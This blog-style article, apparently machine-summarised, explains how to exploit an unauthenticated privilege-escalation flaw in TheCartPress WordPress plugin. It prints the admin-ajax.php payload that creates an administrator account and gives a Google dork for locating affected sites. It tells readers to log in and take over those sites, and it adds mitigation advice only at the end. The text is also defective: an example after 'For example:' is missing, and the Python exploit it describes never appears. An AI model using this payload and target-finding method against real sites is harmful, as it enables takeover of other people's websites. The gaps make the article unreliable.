How to Exploit a WordPress Plugin Vulnerability: A Case Study of TheCartPress

Summary

The article details a security flaw in TheCartPress WordPress plugin that allows unauthenticated attackers to create administrator accounts on affected sites.

Abstract

TheCartPress, a WordPress plugin with over 10,000 active installations, contains a critical vulnerability that permits privilege escalation. This flaw, discovered by security researcher spacehen, enables attackers to craft requests that bypass WordPress's authentication system and create administrator accounts without needing to log in. The article outlines the technical aspects of the exploit, including the specific parameters that can be manipulated to achieve unauthorized access. It also provides guidance on identifying vulnerable sites using Google dorks and exploiting the vulnerability using a Python script. To mitigate the risk, the author recommends updating or uninstalling TheCartPress, using .htaccess rules to block access to the vulnerable admin-ajax.php file, or employing a web application firewall like Wordfence.

Opinions

The author emphasizes the importance of maintaining and updating WordPress plugins to prevent security breaches.
The article suggests that the removal of TheCartPress from the WordPress plugin repository is due to its security issues and lack of updates since April 2018.
It is implied that replacing TheCartPress with a more secure and maintained alternative is a preferable solution to mitigating the vulnerability.
The author indicates that while blocking access to admin-ajax.php might mitigate the specific vulnerability, it could negatively impact the functionality of other plugins.
The use of a web application firewall (WAF) is recommended as an effective protective measure against exploits targeting WordPress plugin vulnerabilities.

How to Exploit a WordPress Plugin Vulnerability: A Case Study of TheCartPress

WordPress plugins are essential for adding functionality and features to your website, but they can also introduce security risks if they are not updated or maintained properly. In this blog post, I will show you how to exploit a privilege escalation vulnerability in TheCartPress plugin, which allows an unauthenticated attacker to create an administrator account on any WordPress site that uses this plugin.

What is TheCartPress Plugin and What is the Vulnerability?

TheCartPress is a WordPress plugin that allows you to create an online store with various features such as product management, shopping cart, checkout, payment gateways, and more. It has over 10,000 active installations and is compatible with WordPress versions up to 5.7.

However, TheCartPress plugin has a serious security flaw that was discovered by spacehen, a security researcher who published an exploit code on October 4th, 2021 1. The vulnerability is an unauthenticated privilege escalation that allows an attacker to create an administrator account on the target site by sending a specially crafted request to the admin-ajax.php file with the action parameter set to tcp_register_and_login_ajax.

The exploit code works by sending the following data to the admin-ajax.php file:

data = {
	"tcp_new_user_name" : "admin_02",
	"tcp_new_user_pass" : "admin1234",
	"tcp_repeat_user_pass" : "admin1234",
	"tcp_new_user_email" : "[email protected]",
	"tcp_role" : "administrator"
}

The tcp_role parameter is the key to this vulnerability, as it allows the attacker to specify any role they want for the new user, including administrator. The plugin does not check or validate this parameter before creating the user, so it effectively bypasses the WordPress authentication system.

How to Find and Exploit Vulnerable Sites Using TheCartPress Plugin?

To find vulnerable sites that use TheCartPress plugin, you can use a Google dork such as:

inurl:/wp-content/plugins/thecartpress/

This will return a list of sites that have the plugin installed in their wp-content directory. You can then use a tool like curl or wget to check if the admin-ajax.php file exists and responds with “User name is required” when accessed without any parameters. For example:

The exploit code will print “Success!” if it successfully creates an administrator account with the username admin_02 and the password admin1234. You can then log in to the WordPress dashboard using these credentials and take over the site.

How to Protect Your Site from This Vulnerability?

The best way to protect your site from this vulnerability is to update or uninstall TheCartPress plugin as soon as possible. The plugin has not been updated since April 2018 and has been removed from the WordPress plugin repository due to security issues 2. Therefore, it is highly recommended that you replace it with a more secure and maintained alternative.

If you cannot update or uninstall TheCartPress plugin for some reason, you can try to mitigate the vulnerability by blocking access to the admin-ajax.php file using .htaccess rules or firewall rules. However, this may affect the functionality of other plugins that rely on admin-ajax.php for legitimate purposes.

Another way to protect your site from this vulnerability is to use a web application firewall (WAF) such as Wordfence 3, which can detect and block malicious requests that exploit WordPress plugin vulnerabilities. Wordfence also provides alerts and updates on new WordPress vulnerabilities and how to fix them.

Conclusion

WordPress plugin vulnerabilities are a common and serious threat to WordPress sites, as they can allow attackers to compromise your site and access your data. In this blog post, I showed you how to exploit a privilege escalation vulnerability in TheCartPress plugin, which affects over 10,000 WordPress sites. I also gave you some tips on how to find and protect your site from this vulnerability.